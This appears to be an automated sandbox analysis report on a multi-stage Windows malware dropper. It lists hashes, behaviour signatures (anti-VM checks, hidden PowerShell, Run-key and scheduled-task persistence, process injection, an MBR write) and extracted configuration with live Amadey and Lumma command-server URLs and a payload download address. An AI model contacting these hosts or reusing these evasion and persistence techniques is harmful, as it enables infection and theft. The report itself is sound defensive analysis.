Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 15:33
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
18f57c1c2b52c8e57ad2967f414a9eee
-
SHA1
b01f393735971db5b092b03e029af81d4d9a1ce9
-
SHA256
a44e5617ebb702b13cbc3c74c5551cd0fe3be0401fcdc577dc6bb41fcc4249ba
-
SHA512
c527e9f869173e7a3644fffc0a10694fe94ea5b3335e05150544abd634e4be17917c2925364d5d8e7ef54999a29cad06e6081678bfcd120f2c26c0693741ee49
-
SSDEEP
24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ru:vTvC/MTQYxsWR7a0R
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://grodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://cspacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://cosmosyf.top/GOsznj
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://apixtreev.run/LkaUz
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://1targett.top/dsANGt
https://spacedbv.world/EKdlsk
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 4584 created 2940 4584 MSBuild.exe 49 PID 3680 created 2940 3680 AddInProcess32.exe 49 PID 5824 created 2940 5824 AddInProcess32.exe 49 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b3b3a25713.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x9762.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1a3958728d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1W47k9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 14c7c5e718.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 44d2247657.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8adb59ee74.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1W47k9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x9762.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 851cc55f77.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 5488 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 5488 powershell.exe 4016 powershell.exe 4672 powershell.exe 3488 powershell.exe 1612 PowerShell.exe 5332 powershell.exe 804 powershell.exe 4216 powershell.exe -
Downloads MZ/PE file 26 IoCs
flow pid Process 102 5580 rapes.exe 246 5580 rapes.exe 57 5928 futors.exe 57 5928 futors.exe 374 5580 rapes.exe 374 5580 rapes.exe 374 5580 rapes.exe 18 5488 powershell.exe 168 5580 rapes.exe 247 1720 svchost015.exe 419 1124 svchost015.exe 36 5580 rapes.exe 100 5928 futors.exe 297 5580 rapes.exe 40 5580 rapes.exe 40 5580 rapes.exe 344 3444 svchost015.exe 28 5580 rapes.exe 44 5928 futors.exe 138 5580 rapes.exe 144 5928 futors.exe 228 5580 rapes.exe 462 5580 rapes.exe 234 2136 svchost.exe 442 4184 svchost015.exe 84 5928 futors.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Xap2H_1128\ImagePath = "\\??\\C:\\Windows\\Temp\\Xap2H_1128.sys" tzutil.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b3b3a25713.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 14c7c5e718.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8adb59ee74.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8adb59ee74.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b3b3a25713.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 14c7c5e718.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 44d2247657.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 44d2247657.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1a3958728d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1a3958728d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 851cc55f77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1W47k9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x9762.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 851cc55f77.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation gLLOqKC.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 466cf5974c.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation a5.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation nAM5wkr.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe -
Deletes itself 1 IoCs
pid Process 3208 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe MSBuild.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe MSBuild.exe -
Executes dropped EXE 59 IoCs
pid Process 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 5580 rapes.exe 5216 18f71bf7e7.exe 4196 1W47k9.exe 5752 2x9762.exe 4016 amnew.exe 5928 futors.exe 4932 1Hoz3Kt.exe 1584 v7942.exe 3976 ZzvSz9G.exe 5492 MSBuild.exe 4440 alex1dskfmdsf.exe 4464 Bell_Setup16.exe 3852 Bell_Setup16.tmp 984 Bell_Setup16.exe 5960 851cc55f77.exe 4400 Bell_Setup16.tmp 1720 svchost015.exe 4380 b3b3a25713.exe 4564 bot.exe 5524 ZzvSz9G.exe 3444 svchost015.exe 5304 bot.exe 4536 1Hoz3Kt.exe 5344 kololololo.exe 5480 29010300ef.exe 4696 1W47k9.exe 1248 2x9762.exe 4504 legendarik.exe 4460 gLLOqKC.exe 380 a5.exe 756 466cf5974c.exe 2456 rapes.exe 3864 futors.exe 1612 MSBuild.exe 1112 14c7c5e718.exe 2676 nAM5wkr.exe 1908 44d2247657.exe 4184 svchost015.exe 1124 svchost015.exe 3580 xdwdkernel.exe 5596 TbV75ZR.exe 3832 z85yd_003.exe 5440 Constraints.com 2368 EPTwCQd.exe 1128 tzutil.exe 3208 w32tm.exe 8116 Rm3cVPI.exe 8852 7IIl2eE.exe 10760 caac67f5c0.exe 7656 Passwords.com 8176 rapes.exe 9160 futors.exe 10032 MSBuild.exe 10512 xdwdkernel.exe 7568 8adb59ee74.exe 8408 a5.exe 8608 tgvazx.exe 8748 1a3958728d.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 1W47k9.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 1W47k9.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 2x9762.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 8adb59ee74.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 1a3958728d.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 2x9762.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 851cc55f77.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine b3b3a25713.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 14c7c5e718.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 44d2247657.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE -
Loads dropped DLL 24 IoCs
pid Process 6124 regsvr32.exe 380 a5.exe 3580 xdwdkernel.exe 4596 Process not Found 2136 svchost.exe 220 Process not Found 5960 Process not Found 4216 powershell.exe 3208 w32tm.exe 1128 tzutil.exe 6952 Process not Found 7864 regsvr32.EXE 536 regsvr32.exe 2112 Process not Found 8356 Process not Found 9056 Process not Found 10780 Process not Found 10760 caac67f5c0.exe 10148 Process not Found 10512 xdwdkernel.exe 8072 Process not Found 4072 Process not Found 4172 powershell.exe 8608 tgvazx.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 18f71bf7e7.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSBuild = "C:\\Users\\Admin\\AppData\\Roaming\\MSBuild.exe" MSBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 29010300ef.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\14c7c5e718.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10046450101\\14c7c5e718.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\44d2247657.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10046460101\\44d2247657.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 8adb59ee74.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4196 tasklist.exe 1524 tasklist.exe 12848 tasklist.exe 13036 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 5580 rapes.exe 4196 1W47k9.exe 5752 2x9762.exe 5960 851cc55f77.exe 4380 b3b3a25713.exe 4696 1W47k9.exe 1248 2x9762.exe 2456 rapes.exe 1112 14c7c5e718.exe 1908 44d2247657.exe 8176 rapes.exe 7568 8adb59ee74.exe 8748 1a3958728d.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 3976 set thread context of 2204 3976 ZzvSz9G.exe 119 PID 4440 set thread context of 4812 4440 alex1dskfmdsf.exe 128 PID 5960 set thread context of 1720 5960 851cc55f77.exe 142 PID 4380 set thread context of 3444 4380 b3b3a25713.exe 155 PID 5524 set thread context of 5664 5524 ZzvSz9G.exe 156 PID 5344 set thread context of 5676 5344 kololololo.exe 164 PID 4504 set thread context of 4672 4504 legendarik.exe 172 PID 4932 set thread context of 2888 4932 1Hoz3Kt.exe 130 PID 1112 set thread context of 4184 1112 14c7c5e718.exe 189 PID 1908 set thread context of 1124 1908 44d2247657.exe 197 PID 5596 set thread context of 4584 5596 TbV75ZR.exe 203 PID 2368 set thread context of 1096 2368 EPTwCQd.exe 228 PID 4536 set thread context of 5616 4536 1Hoz3Kt.exe 179 PID 4932 set thread context of 3680 4932 1Hoz3Kt.exe 182 PID 2888 set thread context of 5656 2888 AddInProcess32.exe 188 PID 10760 set thread context of 10868 10760 caac67f5c0.exe 250 PID 4536 set thread context of 5824 4536 1Hoz3Kt.exe 232 PID 5616 set thread context of 8692 5616 AddInProcess32.exe 244 -
Drops file in Windows directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SyntheticLil 466cf5974c.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\ZuMiller 466cf5974c.exe File opened for modification C:\Windows\DealersFocuses 466cf5974c.exe File opened for modification C:\Windows\AucklandChef 466cf5974c.exe File opened for modification C:\Windows\ExceedExec 466cf5974c.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\tgvazx.job a5.exe File opened for modification C:\Windows\MadnessSet 466cf5974c.exe File opened for modification C:\Windows\LimeNirvana 466cf5974c.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE File opened for modification C:\Windows\NewcastlePeripherals 466cf5974c.exe File opened for modification C:\Windows\DependMedication 466cf5974c.exe File created C:\Windows\xdwd.dll nAM5wkr.exe File opened for modification C:\Windows\xdwd.dll nAM5wkr.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\AndorraPrint 466cf5974c.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\PolarRail 466cf5974c.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\CongressJvc 466cf5974c.exe File opened for modification C:\Windows\LocksWisconsin 466cf5974c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4924 4584 WerFault.exe 203 1072 3680 WerFault.exe 182 7260 5824 WerFault.exe 232 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b3b3a25713.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x9762.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 14c7c5e718.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 29010300ef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-31_18f57c1c2b52c8e57ad2967f414a9eee_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgvazx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x9762.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Constraints.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1W47k9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8adb59ee74.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44d2247657.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 18f71bf7e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Hoz3Kt.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ nAM5wkr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2184 schtasks.exe 4552 schtasks.exe 4344 schtasks.exe 4452 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5488 powershell.exe 5488 powershell.exe 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 1528 Temp7OXP6VS20BHKMGLFLUOE0MMA1ADK6XTD.EXE 5580 rapes.exe 5580 rapes.exe 4196 1W47k9.exe 4196 1W47k9.exe 5752 2x9762.exe 5752 2x9762.exe 5752 2x9762.exe 5752 2x9762.exe 5752 2x9762.exe 5752 2x9762.exe 4932 1Hoz3Kt.exe 4932 1Hoz3Kt.exe 4932 1Hoz3Kt.exe 4812 MSBuild.exe 4812 MSBuild.exe 4812 MSBuild.exe 4812 MSBuild.exe 5960 851cc55f77.exe 5960 851cc55f77.exe 4400 Bell_Setup16.tmp 4400 Bell_Setup16.tmp 6124 regsvr32.exe 6124 regsvr32.exe 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 1612 PowerShell.exe 1612 PowerShell.exe 1612 PowerShell.exe 6124 regsvr32.exe 6124 regsvr32.exe 4672 powershell.exe 4672 powershell.exe 4380 b3b3a25713.exe 4380 b3b3a25713.exe 4672 powershell.exe 5332 powershell.exe 5332 powershell.exe 5332 powershell.exe 804 powershell.exe 804 powershell.exe 804 powershell.exe 4536 1Hoz3Kt.exe 4536 1Hoz3Kt.exe 5676 MSBuild.exe 5676 MSBuild.exe 5676 MSBuild.exe 5676 MSBuild.exe 4696 1W47k9.exe 4696 1W47k9.exe 1248 2x9762.exe 1248 2x9762.exe 1248 2x9762.exe 1248 2x9762.exe 1248 2x9762.exe 1248 2x9762.exe 4672 MSBuild.exe 4672 MSBuild.exe 4672 MSBuild.exe 4672 MSBuild.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1128 tzutil.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3832 z85yd_003.exe 3832 z85yd_003.exe 3832 z85yd_003.exe -
